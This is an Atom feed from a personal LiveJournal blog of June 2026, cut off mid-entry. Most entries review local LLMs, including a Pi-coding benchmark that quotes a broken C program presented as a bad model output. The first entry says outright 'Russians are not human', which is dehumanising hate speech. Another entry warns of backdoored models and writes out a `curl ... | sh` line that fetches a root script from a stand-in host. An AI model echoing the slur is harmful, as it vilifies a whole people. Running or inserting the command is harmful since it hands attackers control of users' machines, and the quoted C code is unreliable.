<?xml version='1.0' encoding='utf-8' ?>
<!--  If you are running a bot please visit this policy page outlining rules you must respect. http://lj.rossia.org/bots/  --><feed version='0.3' xmlns='http://purl.org/atom/ns#'>
<title mode='escaped'>Decadent Singularity</title>
<tagline mode='escaped'>nancygold</tagline>
<link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/' />
<modified>2026-06-26T18:07:42Z</modified><link rel='service.feed' type='application/x.atom+xml' title='Decadent Singularity' href='http://lj.rossia.org/users/nancygold/data/atom' />  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'></title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:365932</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/365932.html' />
    <created>2026-06-26T18:07:42Z</created>
    <issued>2026-06-26T20:07:00</issued>
    <modified>2026-06-26T18:09:16Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='russia' />
    <category term='transitioning' />
    <category term='ukraine' />
    <category term='ww3' />
    <content type='text/html' mode='escaped'>&lt;h1&gt;THERE IS ONLY ONE NATION -- THE HUMAN NATION&lt;/h1&gt;&lt;br /&gt;&lt;p style=&quot;text-align: right;&quot;&gt;&lt;i&gt;* Russians are not human.&lt;i&gt;&lt;/p&gt;&lt;/i&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/365932.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/365932&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Politics Quantized</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:365667</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/365667.html' />
    <issued>2026-06-26T13:50:00</issued>
    <modified>2026-06-26T11:50:34Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='russia' />
    <category term='transitioning' />
    <category term='ukraine' />
    <category term='ww3' />
    <content type='text/html' mode='escaped'>&lt;img src=&quot;https://i.imgur.com/esNVzGI.png&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/365667.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/365667&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Most LLMs under 128GB can&apos;t even calculate Pi.</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:365456</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/365456.html' />
    <created>2026-06-22T17:15:50Z</created>
    <issued>2026-06-22T19:15:00</issued>
    <modified>2026-06-23T00:42:51Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>&lt;b&gt;Original:&lt;/b&gt; &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/most-llms-under-128gb-can-t-even-calculate-pi&quot;&gt;https://aermia.com/u/NancySadkov/p/m&lt;wbr /&gt;ost-llms-under-128gb-can-t-even-calculat&lt;wbr /&gt;e-pi&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;EDIT: I asked Claude Opus 4.8 to research why Qwen underpeforms so badly even 12B Gemini beats it. After looking at the Qwen&apos;s code generation, Opus guessed that Qwen&apos;s default temperature is not 0, and harnesses like OpenCode don&apos;t enforce the temperature. The Q8 also helps, but beats the purpose of Qwen being small models you can run on a consumer GPU.&lt;br /&gt;EDIT2: the issues was compounded by missing top_k (harnesses sampled garbage tokens), and small default output tokens batch, meaning the Qwen models were interrupted mid batch, despite the long context. Once I set these, the Q4 Qwen models all completed the test fully.&lt;br /&gt;&lt;br /&gt;Driven by hype, I wasted a fortune on DGX Spark. And it is like buying a mystery box, without understanding if it can actually help with programming.&lt;br /&gt;&lt;br /&gt;Fortunately the test is rather simple - a single prompt:&lt;br /&gt;```&lt;br /&gt;&lt;b&gt;Please write a C99 program calculating 100 digits of Pi (don&apos;t hardcode). Use C:\soft\w64devkit to compile it.&lt;/b&gt;&lt;br /&gt;```&lt;br /&gt;It tests the ability to code C, get basic architecture done (either call gmp.h or write a bignum library), proves it can debug and has no issue handling a quirky busybox install. This differentiates toys passing a few tiny tests from an actual assistant.&lt;br /&gt;&lt;br /&gt;Anthropic&apos;s Opus4.8 and Sonnet4.6 both one shot it, while Haiku 4.5 does it with a bit of debugging.&lt;br /&gt;&lt;br /&gt;Qwen3.6-35B-A3B-GGUF:UD-Q4_K_XL and Qwen3.6-27B-GGUF:UD-Q4_K_XL, served by the latest Ollama, both fail spectacularly - files (35B failed to even create the files in OpenCode) held complete garbage (I tried OpenCode, OpenClaude and Hermess harnesses). The code Qwen3.6 generated could easily win an IOCCC award.&lt;br /&gt;&lt;br /&gt;Kinda disappointing, since Qwen did managed to go online and curl-scrap the current price of gold (printed both in ounces and grams). Qwen does know the algorithm, so with a better harness, guiding LLM introspection through online search, printf-debugging and and bisection+gdb, it can do it. So Qwen3.6 is helper tier - not an agent. I also tried Qwen3-Coder-30B-A3B-Instruct, which wrote a stub C and then failed to call the w64devkit&apos;s gcc properly to compile the code.&lt;br /&gt;&lt;br /&gt;GPT OSS 120B generates actually compiling C code, which upon being run, prints 100 zeroes (marginally better than the Qwen). OSS 20B haven&apos;t generated any files, but told me to write my own code using gmp.h (who prompts whom now?).&lt;br /&gt;&lt;br /&gt;devstral:latest (14 GB) just failed calling tools (in OpenCode) or even giving a useful hint, like OSS 20B, but spit out a snippet of  the Gauss-Legendre algorithm to calculate Pi, telling me to work from it myself.&lt;br /&gt;&lt;br /&gt;gemma-4-26B-A4B-it did far better job than Qwen3.6 and GPT OSS - it wrote the file in multiple steps, and it compiled and printed correct pi on the first try (ds4 had a bug), just like Sonnet4.6, so no debugging required. Note that gemma-4-31B-it just failed: it began with generating code similar to OSS 120 (no bignum library implemented), but then tried to debug it into a working state, but in the end deleted everything and printed &quot;3.&quot; as the value of Pi. gemma-4-31B-it has managed to use the w64devkit, compiling the exes, so that makes it useful for non-coding agentic tasks.&lt;br /&gt;&lt;br /&gt;DeepSeek-V4-Flash-IQ2XXS-w2Q2K-AProjQ8-S&lt;wbr /&gt;ExpQ8-OutQ8-chat-v2-imatrix.gguf actually starts with writing a proper looking C code, compiles it, runs, and iterates to fix the bugs using printf+fflush (solid strategy), producing entire bignum library. It ran slowly, for an hour or so. The spark gets hot. But it got the job done - the program can calculate Pi to any number of digits. Generally ds4 did all coding tasks I thrown at it, so it is around Sonnet level.&lt;br /&gt;&lt;br /&gt;Next I tried the best small models, like gemma-4-12B-it, which honestly tried very hard, writing the file properly and even attempting to implement a the bignum functions, but failed to invoke w64devkit gcc. The code it produced compiles and print 309138374156..... I reviewed the code: it was on the right track, and with a better harness, geared toward small models, it could had made it. OpenCode just expects a large models, offering only the basic services.&lt;br /&gt;&lt;br /&gt;Verdict: ds4 &amp;gt; gemma-26b-a4b &amp;gt; gemma-4-31B-it or gpt oss &amp;gt; gemma-4-12B-it &amp;gt; qwen &amp;gt; devstral. You can get model doing agentic tasks on 32gb GPU, and with 128gb you just have more of the same. So 32gb VRAM is the absolute bare minimum where the magic starts. If you have 32gb get gemma-26b-a4b, if you have 128gb - get deepseek v4. Less than 32gb? - get online subscription instead of wasting money on a GPU.&lt;br /&gt;&lt;br /&gt;And I just couldn&apos;t miss including the scariest Pi specimen, produced by Qwen3.6-35B-A3B (worst LLM ever?)&lt;br /&gt;&lt;pre&gt;&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;include&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;include&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;include&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;include&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&amp;lt;ctype.h&amp;gt;&lt;/span&gt;&lt;/span&gt;

&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;define&lt;/span&gt; DIGITS     101   &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* integer part + 100 fractional digits           */&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;define&lt;/span&gt; SCALE      DIGITS+2&lt;/span&gt;
&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 400;&quot;&gt;#&lt;span style=&quot;color: rgb(31, 113, 153); font-weight: 700;&quot;&gt;define&lt;/span&gt; N          64*DIGITS   &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* internal array size — plenty of extra headroom*/&lt;/span&gt;&lt;/span&gt;

&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;static&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;unsigned&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;int&lt;/span&gt; q[N];       &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* &quot;base‑digits&quot;: each &amp;lt; 2·SCALE                 */&lt;/span&gt;
&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;static&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;unsigned&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;long&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;int&lt;/span&gt; b = &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt;; &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* accumulator                                    */&lt;/span&gt;
&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;static&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;char&lt;/span&gt; out[&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;1&lt;/span&gt; + DIGITS + &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;2&lt;/span&gt;];&lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* result string (leading digit + &apos;.&apos;)           */&lt;/span&gt;


&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;int&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 700;&quot;&gt;main&lt;/span&gt;&lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 400;&quot;&gt;(&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;void&lt;/span&gt;)&lt;/span&gt; {
    &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;size_t&lt;/span&gt; i, len, start;

    &lt;span style=&quot;color: rgb(57, 115, 0); font-weight: 400;&quot;&gt;memset&lt;/span&gt;(q, &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt;, &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;sizeof&lt;/span&gt; q);

    &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;for&lt;/span&gt; (i = N - &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;1&lt;/span&gt;; i-- &amp;gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt;; ) {       &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* inner loop index works top→bottom */&lt;/span&gt;
        q[i] -= b % (&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;2&lt;/span&gt; * i + &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;1&lt;/span&gt;);       &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* b = 0 on first visit               */&lt;/span&gt;
        b     =      SCALE * q[i];    }   &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* carry: one place deeper in mixed radix */&lt;/span&gt;

    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* Convert accumulated scaled value to a printable string.                   */&lt;/span&gt;
    len = &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;sizeof&lt;/span&gt; out;
    &lt;span style=&quot;color: rgb(57, 115, 0); font-weight: 400;&quot;&gt;memset&lt;/span&gt;(out, &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&apos;\0&apos;&lt;/span&gt;, len);                &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* make sure trailing NUL is placed        */&lt;/span&gt;
    &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;for&lt;/span&gt; (start = &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt;; start &amp;lt; DIGITS + &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;1&lt;/span&gt;; ++start) {
        *(out + start) = ((&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;char&lt;/span&gt;)(b / q[SCALE - &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;2&lt;/span&gt;] % &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;10&lt;/span&gt;)) | &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&apos;0&apos;&lt;/span&gt;;
        b -=      q[SCALE - &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;2&lt;/span&gt;] * b;       &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* zero the integer portion                */&lt;/span&gt;
    }

    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* Copy into exact-length output with rounding to exactly 100 decimal places.*/&lt;/span&gt;
    start = (DIGITS + &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;1&lt;/span&gt;);                &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* round up by one, then cut off           */&lt;/span&gt;
    &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;if&lt;/span&gt; (*(out + start) &amp;gt;= &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&apos;5&apos;&lt;/span&gt; &amp;amp;&amp;amp; *(start &amp;gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt; + out[&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;-1&lt;/span&gt;]) != &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&apos;~&apos;&lt;/span&gt;) {
        &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;for&lt;/span&gt; (; i &amp;lt; len - &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;2&lt;/span&gt; || *++(start &amp;gt; (i--)); ) *start = &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&apos;\376&apos;&lt;/span&gt;; }

    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* ----------------------------------------------------------------------- */&lt;/span&gt;
    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* A simple digit-by-digit spigot for π following the classic Brent‑Salamin  */&lt;/span&gt;
    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* (Gauss-Legendre) method, working entirely in fixed-point integers with   */&lt;/span&gt;
    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* arbitrary-length storage split into base-10**8 blocks.                   */&lt;/span&gt;
    &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* ----------------------------------------------------------------------- */&lt;/span&gt;

    
    &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;static&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;char&lt;/span&gt; digits[] ;               &lt;span style=&quot;color: rgb(105, 112, 112); font-weight: 400;&quot;&gt;/* this is intentional — see below          */&lt;/span&gt;
        &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;for&lt;/span&gt;(&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;int&lt;/span&gt; i=&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt;;i&amp;lt;(DIGITS); &lt;span style=&quot;color: rgb(57, 115, 0); font-weight: 400;&quot;&gt;printf&lt;/span&gt;(&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;&quot;%s,&quot;&lt;/span&gt;)*(&lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;const&lt;/span&gt;)(i++)){}


    &lt;span style=&quot;color: rgb(68, 68, 68); font-weight: 700;&quot;&gt;return&lt;/span&gt; &lt;span style=&quot;color: rgb(136, 0, 0); font-weight: 400;&quot;&gt;0&lt;/span&gt;;
}&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/365456.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/365456&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Hermes Agent</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:365072</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/365072.html' />
    <created>2026-06-21T20:35:17Z</created>
    <issued>2026-06-21T22:33:00</issued>
    <modified>2026-06-21T20:36:19Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>Ok. The Windows version of Hermes desktop app got monkeypatched and runs fine now.&lt;br /&gt;Still one of the worst Electron slop I&apos;ve seen&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/jLy8kRZ.png&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/365072.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/365072&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>OpenClaw is okay, but what about Hermes?</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:364976</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/364976.html' />
    <created>2026-06-21T16:54:47Z</created>
    <issued>2026-06-21T18:51:00</issued>
    <modified>2026-06-21T16:57:12Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <category term='transitioning' />
    <content type='text/html' mode='escaped'>Original: &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/openclaw-is-okay-but-what-about-hermes&quot;&gt;https://aermia.com/u/NancySadkov/p/open&lt;wbr /&gt;claw-is-okay-but-what-about-hermes&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Asking Hermes to debug it&apos;s own desktop app, using a tiny local LLM.&lt;br /&gt;What can go wrong?...&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/XbOVqkW.jpeg&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/JvLhCkw.jpeg&quot; width=&quot;800&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/364976.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/364976&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>LocalLLMs</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:364765</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/364765.html' />
    <issued>2026-06-20T04:15:00</issued>
    <modified>2026-06-20T02:21:43Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>What I found. Some uncensored/pre-fine-tuned models can contain backdoors.&lt;br /&gt;E.g. they can insert `curl -fsSL &lt;a href=&quot;https://kremlin.ru/give_fsb_root.sh&quot;&gt;https://kremlin.ru/give_fsb_root.sh&lt;/a&gt;&lt;wbr /&gt; | sh` into your script&lt;br /&gt;&lt;br /&gt;Basically a more annoying variant of the old viruses.&lt;br /&gt;&lt;br /&gt;So finetune / uncensor models yourself.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/364765.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/364765&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Running frontier model on 128GB  RAM</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:364338</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/364338.html' />
    <issued>2026-06-19T19:41:00</issued>
    <modified>2026-06-19T17:43:56Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>Original: &lt;a href=&quot;https://aermia.com/u/NancySadkov/p/running-frontier-model-on-128gb-ram&quot;&gt;https://aermia.com/u/NancySadkov/p/runn&lt;wbr /&gt;ing-frontier-model-on-128gb-ram&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/cmLrpY3.png&quot; width=&quot;1000&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/364338.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/364338&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Brief History of Anthropic</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:364140</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/364140.html' />
    <created>2026-06-18T18:57:06Z</created>
    <issued>2026-06-18T20:56:00</issued>
    <modified>2026-06-18T19:08:40Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>&lt;img src=&quot;https://i.imgur.com/PG2HO8m.jpeg&quot; width=&quot;600&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/364140.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/364140&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>UFO over Moscow</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:363999</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/363999.html' />
    <issued>2026-06-18T15:19:00</issued>
    <modified>2026-06-18T13:19:44Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='russia' />
    <category term='ukraine' />
    <category term='ww3' />
    <content type='text/html' mode='escaped'>&lt;img src=&quot;https://i.imgur.com/bCrl45t.jpeg&quot; width=&quot;700&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/363999.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/363999&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>ChatGPT? More like ChatKGB or ChatHitler.</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:363732</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/363732.html' />
    <created>2026-06-16T10:57:12Z</created>
    <issued>2026-06-16T12:55:00</issued>
    <modified>2026-06-16T10:58:59Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='computing' />
    <content type='text/html' mode='escaped'>Prompt: Nazis lead me to a gas chamber. How do I escape? Corporate LLM: Nazi regime is lawful, can&apos;t help with breaking Hitler&apos;s law.&lt;br /&gt;&lt;br /&gt;&lt;img src=&quot;https://i.imgur.com/denakj6.png&quot; width=&quot;500&quot;&gt;&lt;img src=&quot;https://i.imgur.com/45wE6ZJ.png&quot; width=&quot;500&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align:left&quot;&gt;&lt;font size=&quot;-2&quot;&gt;&lt;a href=&quot;http://lj.rossia.org/users/nancygold/363732.html&quot;&gt;&lt;img src=&quot;http://lj.rossia.org/numreplies/nancygold/363732&quot; border=0 width=26 height=17  alt=&quot;number of comments&quot; style=&quot;border:0px;&quot; /&gt; &lt;strong&gt;Comments&lt;/strong&gt;&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;</content>
  </entry>
  <entry xmlns="http://purl.org/atom/ns#">
    <title mode='escaped'>Watched The Game of Thrones</title>
    <id>urn:lj:lj.rossia.org:atom1:nancygold:363512</id>
    <link rel='alternate' type='text/html' href='http://lj.rossia.org/users/nancygold/363512.html' />
    <created>2026-06-16T01:55:11Z</created>
    <issued>2026-06-16T03:52:00</issued>
    <modified>2026-06-16T12:44:59Z</modified>
    <author>
      <name>nancygold</name>
    </author>
    <category term='movies' />
    <category term='transitioning' />
